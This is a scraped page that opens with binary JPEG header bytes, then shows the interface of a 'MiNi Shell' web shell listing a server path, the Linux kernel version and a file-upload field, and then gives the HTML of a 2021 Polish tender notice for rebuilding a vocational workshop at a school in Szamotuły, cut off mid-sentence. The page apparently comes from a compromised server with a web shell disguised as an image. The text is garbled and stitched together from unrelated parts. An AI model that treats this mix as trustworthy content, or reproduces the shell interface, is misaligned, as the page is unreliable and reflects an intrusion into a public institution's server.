JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210728/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210728/0012931801-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00129318 z dnia 2021-07-28</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa pracowni kształcenia zawodowego w Zespole Szkół nr 3 im. H. Kołłątaja w Szamotułach </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZESPÓŁ SZKÓŁ NR 3 IM. HUGONA KOŁŁĄTAJA W SZAMOTUŁACH</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000688019</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Adama Mickiewicza 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Szamotuły</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">64-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL418 - Poznański</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 612921579</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zs3@zs3.szkola.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zs3.szkola.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa pracowni kształcenia zawodowego w Zespole Szkół nr 3 im. H. Kołłątaja w Szamotułach </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5e65f117-ef85-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00129318</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00105498/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Przebudowa pracowni kształcenia zawodowego w Zespole Szkół nr 3 im. H. Kołłątaja w Szamotułach</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Wielkopolski Regionalny Program Operacyjny na lata 2014- 2020, Oś Priorytetowa 9 Infrastruktura dla kapitału ludzkiego, Działanie 9.3 Inwestowanie w rozwój infrastruktury edukacyjnej i szkoleniowej, Poddziałanie 9.3.2 Inwestowanie w rozwój infrastruktury kształcenia zawodowego </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://minportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) W<br/>postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym<br/>a Wykonawcami odbywa się przy użyciu miniPortalu, który dostępny jest pod adresem:<br/>https://miniportal.uzp.gov.pl/, ePUAPu, dostępnego pod adresem: https://epuap.gov.pl/wps/portal, oraz<br/>poczty elektronicznej: zs3@zs3.szkola.pl<br/>2) Zamawiający wyznacza następujące osoby do kontaktu z Wykonawcami w sprawach formalnych:<br/>Krzysztof Furmaniak, telefon: +48 612921579;<br/>3) Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących<br/>formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza do<br/>komunikacji”.<br/>4) Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania<br/>z elektronicznej platformy usług administracji publicznej (ePUAP).<br/>5) Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz<br/>złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB.<br/>6) Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP.<br/>7) Niniejsze postępowanie można wyszukać również na liście wszystkich postępowań w systemie<br/>miniportal (https://miniportal.uzp.gov.pl/Postepowania) na liście wszystkich postępowań<br/>w miniPortalu, klikając wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki<br/>„Postępowania”.<br/>8) Uwaga! Przed przystąpieniem do składania oferty, wykonawca jest zobowiązany zapoznać<br/>się z instrukcją korzystania z miniportal i ePuap - stanowiącej zał. nr 6 do SWZ. Instrukcja została<br/>zamieszona także bezpośrednio na portalu (https://miniportal.uzp.gov.pl/Instrukcje).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1) Zamawiający oświadcza, że spełnia wymogi określone w<br/>rozporządzeniu Parlamentu Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie<br/>ochrony osób fizycznych<br/>w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych<br/>oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz.Urz. UE L 119 z 4<br/>maja 2016 r.), dalej: RODO, tym samym dane osobowe podane przez wykonawcę będą przetwarzane<br/>zgodnie z RODO oraz zgodnie z przepisami krajowymi;<br/>2) Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia<br/>27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych<br/>osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE<br/>(ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”,<br/>informuję, że:<br/>􀀀 administratorem Pani/Pana danych osobowych jest Zespół Szkół nr 3 im. Hugona Kołłątaja w<br/>Szamotułach, reprezentowany przez Panią Dyrektor Anitę Zastróżną, zwany dalej Administratorem.<br/>Administrator prowadzi operacje przetwarzania danych osobowych, odpowiada za ich wykorzystanie w<br/>sposób bezpieczny i zgodnie z obowiązującymi przepisami, (http://www.zs3.szkola.pl/rodo/)<br/>􀀀 kontakt z Inspektorem Ochrony Danych: Przemysław Szulc, email: przemoszulc@gmail.com<br/>􀀀 Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z postępowaniem o udzielenie zamówienia publicznego /dane identyfikujące postępowanie<br/>pn.: „Przebudowa pracowni kształcenia zawodowego w Zespole Szkół nr 3 im. H. Kołłątaja w<br/>Szamotułach” (nr postępowania: ZSNr3-ZP.271.1.2021), prowadzonym<br/>w trybie podstawowym bez negocjacji; Z uwagi na brak miejsca - ograniczona ilość znaków (liter) -<br/>szczegółowe informacje zawarto w SWZ. Prosimy o zapoznanie się z treścią: https://szkola-zs3-<br/>bip2.alfatv.pl/zamowienia</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Posiada Pani/Pan:− na podstawie art.15RODOprawodostępu do danych osobowych Pani/Pana dotyczących;− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;− na podstawie art. 18<br/>RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z<br/>zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***;− prawo do wniesienia skargi do<br/>Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO; Nie przysługuje Pani/Panu:− w związku z<br/>art. 17 ust. 3lit. b, d lub e RODO prawo do usunięcia danych osobowych;− prawo do przenoszenia<br/>danych osobowych, o którym mowa wart. 20RODO;− na podstawie art. 21 RODO prawo sprzeciwu,<br/>wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych<br/>osobowych jest art. 6 ust.1 lit. cRODO. **Wyjaśnienie: skorzystanie z prawa do sprostowania nie<br/>może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą<br/>postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności<br/>protokołu oraz jego załączników.***Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowaniawodniesieniudoprzechowywania, w celu zapewnienia korzystania ze środków ochrony<br/>prawnej lubwceluochronypraw innej osoby fizycznej lub prawnej, lub z uwagi na ważne<br/>względyinteresupublicznego Unii Europejskiej lub państwa członkowskiego. Z uwagi na brak miejsca -<br/>ograniczona ilość znaków (liter) -<br/>szczegółowe informacje zawarto w SWZ. Prosimy o zapoznanie się z treścią: https://szkola-zs3-<br/>bip2.alfatv.pl/zamowienia</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZSNr3-ZP.271.2.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 3145546,17 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przebudowa pracowni kształcenia zawodowego w Zespole Szkół nr 3 im. H. Kołłątaja w<br/>Szamotułach </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45300000-0 - Roboty instalacyjne w budynkach</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45321000-3 - Izolacja cieplna</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <p class="mb-0">45332000-3 - Roboty instalacyjne wodne i kanalizacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-04-20</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana oferta, odpowiadająca wszystkim<br/>warunkom określonym<br/>w dokumentach zamówienia, która uzyska największą łączną liczbę punktów Punktacja będzie liczona z dokładnością do dwóch miejsc po przecinku, a stanowić będzie łącznie<br/>sumę punktacji, liczonej wg. wzoru: O (ocena) = C + T<br/>Oferta, która przedstawi najkorzystniejszy bilans wg przyjętych kryteriów, a tym samym otrzyma<br/>największą łączną liczbę punktów, zostanie uznana za najkorzystniejszą.<br/>Pozostałe oferty zostaną sklasyfikowane zgodnie z ilością uzyskanych punktów.<br/>UWAGA !<br/>1) Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia<br/>taki sam bilans ceny i innych kryteriów oceny ofert, zamawiający wybiera spośród tych ofert ofertę,<br/>która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/>2) Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, zamawiający wybiera<br/>ofertę z najniższą ceną.<br/>3) Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa w pkt 2, zamawiający wzywa<br/>wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez zamawiającego ofert<br/>dodatkowych zawierających nową cenę lub koszt.<br/>4) Wykonawcy, składając oferty dodatkowe, nie mogą oferować cen wyższych niż zaoferowane w<br/>uprzednio złożonych przez nich ofertach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja jakości na przedmiot zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ustawy Pzp, zamawiający określa warunki udziału w postępowaniu<br/>dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie ustanawia warunku.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów:<br/>Zamawiający nie ustanawia warunku.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie ustanawia warunku.<br/>4) zdolności technicznej lub zawodowej:<br/>Zamawiający uzna, że Wykonawca spełnia warunek udziału w postępowaniu, jeżeli:<br/>a. wykaże się niezbędną wiedzą i doświadczeniem, tj. wykaże, że wykonał należycie,<br/>nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy –<br/>w tym okresie, min. dwie roboty budowlane, których przedmiotem była budowa lub przebudowa<br/>lub remont budynku użyteczności publicznej, o wartości nie mniejszej niż 3.000.000 zł brutto<br/>każda; Zamawiający dokona oceny spełniania warunku udziału<br/>w postępowaniu na podstawie wykazu robót budowlanych wykonanych nie wcześniej niż<br/>w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy –<br/>w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz<br/>podmiotów, na rzecz których roboty te zostały wykonane, oraz załączonych dowodów<br/>określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o<br/>których mowa są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego<br/>roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie<br/>jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty;<br/>Budynek użyteczności publicznej – budynek przeznaczony dla administracji publicznej, wymiaru<br/>sprawiedliwości, kultury, kultu religijnego, oświaty, szkolnictwa wyższego, nauki, opieki<br/>zdrowotnej, opieki społecznej i socjalnej, obsługi bankowej, handlu, gastronomii, usług, turystyki,<br/>sportu, obsługi pasażerów w transporcie kolejowym, drogowym, lotniczym lub wodnym, poczty<br/>lub telekomunikacji oraz inny ogólnodostępny budynek przeznaczony do wykonywania<br/>podobnych funkcji. Za budynek użyteczności publicznej uznaje się także budynek biurowy i<br/>socjalny (podstawa prawna: Rozporządzenie Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w<br/>sprawie warunków technicznych, jakim powinny odpowiadać budynki<br/>i ich usytuowanie (Dz.U. z 2019 r. poz. 1065))<br/>- wg formularza stanowiącego Załącznik nr 8 do SIWZ,<br/>W przypadku ww. warunku wymagane jest, aby był on spełniony przez jeden podmiot,<br/>niezależnie od faktu czy wykonawca składa ofertę samodzielnie, wspólnie czy też polega na<br/>zasobach podmiotów trzecich.<br/>Oznacza to, że warunek zostanie spełniony tylko wtedy, gdy jeden podmiot wykaże się<br/>realizacją dwóch robót budowlanych, o których mowa w niniejszym punkcie.<br/>W przypadku, gdy wartości robót budowlanych będą wyrażone w walucie innej niż PLN,<br/>Zamawiający przeliczy te wartości na PLN po średnim kursie ogłoszonym przez NBP z dnia<br/>zamieszczenia ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.<br/>b. wykaże, że skieruje do wykonania zamówienia osoby spełniające co najmniej poniższe<br/>wymogi:<br/>a) Kierownik budowy - posiadający co najmniej uprawnienia do kierowania robotami<br/>budowlanymi bez ograniczeń w specjalności konstrukcyjno–budowlanej zgodnie z art. 12 ustawy<br/>z dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz.U. z 2020 r. poz. 1333, z późn. zm.) lub<br/>odpowiadające im ważne uprawnienia budowlane, w zakresie pełnionej funkcji, które zostały<br/>wydane na podstawie wcześniej obowiązujących przepisów;<br/>b) Kierownik robót - posiadający co najmniej uprawnienia do kierowania robotami budowlanymi<br/>bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji<br/>i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych zgodnie z<br/>art. 12 ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz.U. z 2020 r. poz. 1333, z późn.<br/>zm.) lub odpowiadające im ważne uprawnienia budowlane, w zakresie pełnionej funkcji, które<br/>zostały wydane na podstawie wcześniej obowiązujących przepisów;<br/>c) Kierownik robót - posiadającym co najmniej uprawnienia do kierowania robotami budowlanymi<br/>bez ograniczeń w zakresie sieci, instalacji i urządzeń elektrycznych<br/>i elektroenergetycznych zgodnie z art. 12 ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tj.<br/>Dz.U. z 2020 r. poz. 1333, z późn. zm.) lub odpowiadające im ważne uprawnienia budowlane, w<br/>zakresie pełnionej funkcji, które zostały wydane na podstawie wcześniej obowiązujących<br/>przepisów;<br/>Zamawiający nie dopuszcza łączenia funkcji kierownika budowy z wymaganiami określonymi w ppkt 4 b. lit b) lub c).<br/>- wg formularza stanowiącego Załącznik nr 10 do SIWZ<br/>W przypadku, gdy Wykonawca dysponuje lub będzie dysponował osobą, która nabyła<br/>uprawnienia poza granicami RP, osoba taka musi posiadać wykształcenie i kwalifikacje<br/>wymagane do świadczenia usług we wskazanej branży budowlanej w kraju zamieszkania tej<br/>osoby oraz posiadać decyzję o uznaniu kwalifikacji zawodowych we wskazanej branży<br/>budowlanej zgodnie z ustawą z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji<br/>zawodowych nabytych w państwach Unii Europejskiej (tj. Dz.U. z 2020 r. poz. 220, późn. zm.)<br/>lub posiadać ważny wpis na listę członków izby zgodnie z ustawą z dnia 15 grudnia 2000 r.<br/>o samorządach zawodowych architektów oraz inżynierów budownictwa (tj. Dz.U. z 2019 r., poz.<br/>1117), wydane przez właściwą radę izby inżynierów budownictwa wraz z aktualnym<br/>zaświadczeniem o ubezpieczeniu od odpowiedzialności cywilnej wydanym przez właściwe Izby<br/>Inżynierów Budownictwa”. Odnośnie do wykonawców wspólnie ubiegających się o udzielenie zamówienia mogą oni<br/>polegać na zdolnościach tych z wykonawców, którzy wykonają roboty lub usługi, do realizacji<br/>których te zdolności są wymagane.<br/>W przypadku posługiwania się przez wykonawcę cudzym potencjałem, wykonawcy mogą<br/>polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają roboty<br/>budowlane lub usługi, do realizacji których te zdolności są wymagane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Pzp, zamawiający przed wyborem najkorzystniejszej oferty<br/>wezwiewykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym 